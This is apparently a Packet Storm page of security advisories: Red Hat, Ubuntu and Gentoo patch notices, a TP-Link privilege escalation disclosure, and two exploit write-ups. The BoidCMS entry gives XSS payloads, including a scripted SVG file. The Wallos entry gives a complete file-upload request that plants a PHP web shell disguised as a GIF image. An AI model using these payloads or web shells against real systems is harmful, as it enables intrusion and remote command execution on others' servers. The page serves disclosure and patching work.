Red Hat Security Advisory 2024-1075-03 - An update for edk2 is now available for Red Hat Enterprise Linux 9. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1075.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: edk2 security updateAdvisory ID:        RHSA-2024:1075-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1075Issue date:         2024-03-05Revision:           03CVE Names:          CVE-2023-45230====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es):* edk2: Buffer overflow in the DHCPv6 client via a long Server ID option (CVE-2023-45230)* edk2: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message (CVE-2023-45234)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45230References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2258685https://bugzilla.redhat.com/show_bug.cgi?id=2258697

Red Hat Security Advisory 2024-1075-03

Red Hat Security Advisory 2024-1074-03 - An update for the 389-ds:1.4 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a heap overflow vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1074.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: 389-ds:1.4 security update  
Advisory ID:        RHSA-2024:1074-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1074  
Issue date:         2024-03-05  
Revision:           03  
CVE Names:          CVE-2024-1062  
====================================================================

Summary: 

An update for the 389-ds:1.4 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

389 Directory Server is an LDAP version 3 (LDAPv3) compliant server. The base packages include the Lightweight Directory Access Protocol (LDAP) server and command-line utilities for server administration. 

Security Fix(es):

* 389-ds-base: a heap overflow leading to denail-of-servce while writing a value larger than 256 chars (in log_entry_attr) (CVE-2024-1062)

Bug Fix(es):

* dtablesize being set to soft maxfiledescriptor limit causing massive slowdown in large enviroments. [rhel-8.6.0.z] (JIRA:RHEL-15025)

* Paged search impacts performance [rhel-8.6.0.z] (JIRA:RHEL-15030)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1062

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2261879  
https://issues.redhat.com/browse/RHEL-15025  
https://issues.redhat.com/browse/RHEL-15030

Red Hat Security Advisory 2024-1074-03

Red Hat Security Advisory 2024-1072-03 - An update is now available for Red Hat Ansible Automation Platform 2.4. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1072.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat Ansible Automation Platform 2.4 Container Release Security and Bug Fix UpdateAdvisory ID:        RHSA-2024:1072-03Product:            Red Hat Ansible Automation PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1072Issue date:         2024-03-04Revision:           03CVE Names:          CVE-2022-40896====================================================================Summary: An update is now available for Red Hat Ansible Automation Platform 2.4Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.Security Fix(es):* ee-supported-container: pygments: ReDoS in pygments (CVE-2022-40896)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Updates:* Add default value for EDA_MAX_RUNNING_ACTIVATIONS setting (AAP-21108)* EDA operator deployments now automatically refresh after settings changes (AAP-11918)* receptor 1.4.4* automation-eda-controller 1.0.5* automation-controller 4.5.2* ee-supported: Update pygments to 2.17.2 (AAP-18546)Solution:CVEs:CVE-2022-40896References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2251643

Red Hat Security Advisory 2024-1072-03

Red Hat Security Advisory 2024-1071-03 - An update for the postgresql:12 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1071.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql:12 security updateAdvisory ID:        RHSA-2024:1071-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1071Issue date:         2024-03-04Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for the postgresql:12 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-1071-03

Ubuntu Security Notice 6673-1 - Hubert Kario discovered that python-cryptography incorrectly handled errors returned by the OpenSSL API when processing incorrect padding in RSA PKCS#1 v1.5. A remote attacker could possibly use this issue to expose confidential or sensitive information. It was discovered that python-cryptography incorrectly handled memory operations when processing mismatched PKCS#12 keys. A remote attacker could possibly use this issue to cause python-cryptography to crash, leading to a denial of service. This issue only affected Ubuntu 23.10.

==========================================================================  
Ubuntu Security Notice USN-6673-1  
March 04, 2024

python-cryptography vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in python-cryptography.

Software Description:  
- python-cryptography: Cryptography Python library

Details:

Hubert Kario discovered that python-cryptography incorrectly handled  
errors returned by the OpenSSL API when processing incorrect padding in  
RSA PKCS#1 v1.5. A remote attacker could possibly use this issue to expose  
confidential or sensitive information. (CVE-2023-50782)

It was discovered that python-cryptography incorrectly handled memory  
operations when processing mismatched PKCS#12 keys. A remote attacker could  
possibly use this issue to cause python-cryptography to crash, leading to a  
denial of service. This issue only affected Ubuntu 23.10. (CVE-2024-26130)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   python3-cryptography            38.0.4-4ubuntu0.23.10.2

Ubuntu 22.04 LTS:  
   python3-cryptography            3.4.8-1ubuntu2.2

Ubuntu 20.04 LTS:  
   python-cryptography             2.8-3ubuntu0.3  
   python3-cryptography            2.8-3ubuntu0.3

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   python-cryptography             2.1.4-1ubuntu1.4+esm1  
   python3-cryptography            2.1.4-1ubuntu1.4+esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6673-1  
   CVE-2023-50782, CVE-2024-26130

Package Information:  
https://launchpad.net/ubuntu/+source/python-cryptography/38.0.4-4ubuntu0.23.10.2  
https://launchpad.net/ubuntu/+source/python-cryptography/3.4.8-1ubuntu2.2  
https://launchpad.net/ubuntu/+source/python-cryptography/2.8-3ubuntu0.3

Ubuntu Security Notice USN-6673-1

BoidCMS version 2.0.1 suffers from multiple cross site scripting vulnerabilities. Original discovery of cross site scripting in this version is attributed to Rahad Chowdhury in December of 2023, though this advisory provides additional vectors of attack.

    # Exploit Title: Multiple XSS Issues in boidcmsv2.0.1# Date: 3/2024# Exploit Author: Andrey Stoykov# Version: 2.0.1# Tested on: Ubuntu 22.04# Blog: http://msecureltd.blogspot.comXSS via SVG File UploadSteps to Reproduce:1. Login with admin user2. Visit "Media" page3. Upload xss.svg4. Click "View" and XSS payload will execute// xss.svg contents<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"stroke="#004400"/>   <script type="text/javascript">      alert(`XSS`);   </script></svg>Reflected XSS:Steps to Reproduce:1. Login as admin2. Visit "Media" page3. Click "Delete" and intercept the HTTP GET request4. In "file" parameter add the payload "<script>alert(1)</script>"5. After forwarding the HTTP GET request a browser popup would surfaceStored XSS:Steps to Reproduce:1. Login as admin2. Visit "Settings" page3. Enter XSS payload in "Title", "Subtitle", "Footer"4. Then visit the blog page

BoidCMS 2.0.1 Cross Site Scripting

Gentoo Linux Security Advisory 202403-3 - Multiple vulnerabilities have been discovered in UltraJSON, the worst of which could lead to key confusion and value overwriting. Versions greater than or equal to 5.4.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202403-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: UltraJSON: Multiple Vulnerabilities  
     Date: March 03, 2024  
     Bugs: #855689  
       ID: 202403-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in UltraJSON, the worst of  
which could lead to key confusion and value overwriting.

Background  
==========

UltraJSON is an ultra fast JSON encoder and decoder written in pure C  
with bindings for Python 3.8+.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
dev-python/ujson  < 5.4.0       >= 5.4.0

Description  
===========

Affected versions were found to improperly decode certain characters.  
JSON strings that contain escaped surrogate characters not part of a  
proper surrogate pair were decoded incorrectly. Besides corrupting  
strings, this allowed for potential key confusion and value overwriting  
in dictionaries. All users parsing JSON from untrusted sources are  
vulnerable. From version 5.4.0, UltraJSON decodes lone surrogates in the  
same way as the standard library's `json` module does, preserving them  
in the parsed output.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All UltraJSON users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/ujson-5.4.0"

References  
==========

[ 1 ] CVE-2022-31116  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31116  
[ 2 ] CVE-2022-31117  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31117

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202403-03

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202403-03

TP-Link JetStream Smart Switch TL-SG2210P version 5.0 build 20211201 suffers from a privilege escalation vulnerability.

**TP-Link JetStream Smart Switch TL-SG2210P 5.0 Build 20211201 Privilege Escalation**

    [+] Credits: Shahnawaz Shaikh, Security Researcher at Cybergate Defense LLC[+] twitter.com/_striv3r_[Vendor]Tp-Link (http://tp-link.com)[Product]JetStream Smart Switch - TL-SG2210P v5.0 Build 20211201[Vulnerability Type]Improper Access Control[Affected Product Code Base]JetStream Smart Switch - TL-SG2210P v5.0 Build 20211201[Affected Component]usermanagement, swtmactablecfg endpoints of webconsole[CVE Reference]CVE-2023-43318[Security Issue]TP-Link JetStream Smart Switch TL-SG2210P 5.0 Build 20211201 allowsattackers to escalate privileges via modification of the 'tid' and 'usrlvl'values in GET requests.[Exploit/POC]N/A[Network Access]Remote[Severity]High[Disclosure Timeline]Vendor Notification: September 12, 2023Vendor released fixed firmware TL-SG2210P(UN)_V5.20_5.20.1 Build 20240202:February 29, 2024March 1, 2024 : Public Disclosure

TP-Link JetStream Smart Switch TL-SG2210P 5.0 Build 20211201 Privilege Escalation

Gentoo Linux Security Advisory 202403-2 - Multiple vulnerabilities have been discovered in Blender, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 3.1.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202403-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Blender: Multiple Vulnerabilities  
     Date: March 03, 2024  
     Bugs: #834011  
       ID: 202403-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Blender, the worst of  
which could lead to arbitrary code execution.

Background  
==========

Blender is a 3D Creation/Animation/Publishing System.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
media-gfx/blender  < 3.1.0       >= 3.1.0

Description  
===========

Multiple vulnerabilities have been discovered in Blender. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Blender users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-gfx/blender-3.1.0"

References  
==========

[ 1 ] CVE-2022-0544  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0544  
[ 2 ] CVE-2022-0545  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0545  
[ 3 ] CVE-2022-0546  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0546

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202403-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202403-02

Wallos versions prior to 1.11.2 suffer from a remote shell upload vulnerability.

# Exploit Title: Wallos - File Upload RCE (Authenticated)  
# Date: 2024-03-04  
# Exploit Author: sml@lacashita.com  
# Vendor Homepage: https://github.com/ellite/Wallos  
# Software Link: https://github.com/ellite/Wallos  
# Version: < 1.11.2  
# Tested on: Debian 12

Wallos allows you to upload an image/logo when you create a new subscription.  
This can be bypassed to upload a malicious .php file.

POC  
---

1) Log into the application.  
2) Go to "New Subscription"  
3) Upload Logo and choose your webshell .php  
4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:

--- SNIP -----------------

POST /endpoints/subscription/add.php HTTP/1.1

Host: 192.168.1.44

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.1.44/

Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324

Origin: http://192.168.1.44

Content-Length: 7220

Connection: close

Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="name"

test

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo"; filename="revshell.php"

Content-Type: image/jpeg

GIF89a;

<?php  
system($_GET['cmd']);  
?> 

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo-url"

----- SNIP -----

5) You will get the response that your file was uploaded ok:

{"status":"Success","message":"Subscription updated successfully"}

6) Your file will be located in:   
http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php

Source

Packet Storm